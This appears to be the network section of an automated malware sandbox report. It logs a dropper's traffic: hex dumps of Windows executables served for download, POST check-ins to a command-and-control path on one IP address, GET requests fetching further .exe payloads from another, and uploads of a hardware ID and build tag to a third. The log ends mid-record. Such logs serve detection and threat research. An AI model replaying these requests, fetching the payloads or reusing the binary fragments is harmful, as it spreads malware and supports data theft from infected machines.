Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 01 Nov 2024 04:53:41 GMTContent-Type: application/octet-streamContent-Length: 1917440Last-Modified: Fri, 01 Nov 2024 04:44:30 GMTConnection: keep-aliveETag: "67245cae-1d4200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 00 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 4c 00 00 04 00 00 83 94 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 44 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c e4 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c e4 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2b 00 00 b0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 79 77 7a 76 68 70 67 00 30 1a 00 00 c0 31 00 00 26 1a 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 75 78 78 6c 66 7a 77 00 10 00 00 00 f0 4b 00 00 04 00 00 00 1c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 00 4c 00 00 22 00 00 00 20 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 01 Nov 2024 04:53:42 GMTContent-Type: application/octet-streamContent-Length: 2778624Last-Modified: Fri, 01 Nov 2024 04:00:31 GMTConnection: keep-aliveETag: "6724525f-2a6600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2b 00 00 04 00 00 6b 78 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 63 66 79 65 73 72 79 79 00 20 2a 00 00 a0 00 00 00 06 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 77 6e 74 75 69 6c 70 00 20 00 00 00 c0 2a 00 00 04 00 00 00 40 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 2a 00 00 22 00 00 00 44 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 01 Nov 2024 04:53:50 GMTContent-Type: application/octet-streamContent-Length: 1917440Last-Modified: Fri, 01 Nov 2024 04:44:30 GMTConnection: keep-aliveETag: "67245cae-1d4200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 00 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 4c 00 00 04 00 00 83 94 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 44 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c e4 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c e4 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2b 00 00 b0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 79 77 7a 76 68 70 67 00 30 1a 00 00 c0 31 00 00 26 1a 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 75 78 78 6c 66 7a 77 00 10 00 00 00 f0 4b 00 00 04 00 00 00 1c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 00 4c 00 00 22 00 00 00 20 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 01 Nov 2024 04:54:11 GMTContent-Type: application/octet-streamContent-Length: 2778624Last-Modified: Fri, 01 Nov 2024 04:00:31 GMTConnection: keep-aliveETag: "6724525f-2a6600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2b 00 00 04 00 00 6b 78 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 63 66 79 65 73 72 79 79 00 20 2a 00 00 a0 00 00 00 06 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 77 6e 74 75 69 6c 70 00 20 00 00 00 c0 2a 00 00 04 00 00 00 40 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 2a 00 00 22 00 00 00 44 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 01 Nov 2024 04:54:13 GMTContent-Type: application/octet-streamContent-Length: 1917440Last-Modified: Fri, 01 Nov 2024 04:44:30 GMTConnection: keep-aliveETag: "67245cae-1d4200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 00 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 4c 00 00 04 00 00 83 94 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 44 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c e4 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c e4 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2b 00 00 b0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 79 77 7a 76 68 70 67 00 30 1a 00 00 c0 31 00 00 26 1a 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 75 78 78 6c 66 7a 77 00 10 00 00 00 f0 4b 00 00 04 00 00 00 1c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 00 4c 00 00 22 00 00 00 20 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 41 37 33 42 36 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52A73B65E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 33 30 39 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003093001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 33 30 39 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003094001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGIEHDBAAFIDGDAAAAHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 47 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 30 36 41 36 33 36 42 46 31 34 38 32 36 30 34 39 38 32 31 36 30 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 2d 2d 0d 0a Data Ascii: ------ECBGIEHDBAAFIDGDAAAAContent-Disposition: form-data; name="hwid"706A636BF1482604982160------ECBGIEHDBAAFIDGDAAAAContent-Disposition: form-data; name="build"tale------ECBGIEHDBAAFIDGDAAAA--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 33 30 39 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003095001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHCGHJDBFIIDGDHIJDBHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 30 36 41 36 33 36 42 46 31 34 38 32 36 30 34 39 38 32 31 36 30 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 2d 2d 0d 0a Data Ascii: ------CFHCGHJDBFIIDGDHIJDBContent-Disposition: form-data; name="hwid"706A636BF1482604982160------CFHCGHJDBFIIDGDHIJDBContent-Disposition: form-data; name="build"tale------CFHCGHJDBFIIDGDHIJDB--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 33 30 39 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003096001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 41 37 33 42 36 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52A73B65E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AECAECFCAAEBFHIEHDGHHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 30 36 41 36 33 36 42 46 31 34 38 32 36 30 34 39 38 32 31 36 30 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 2d 2d 0d 0a Data Ascii: 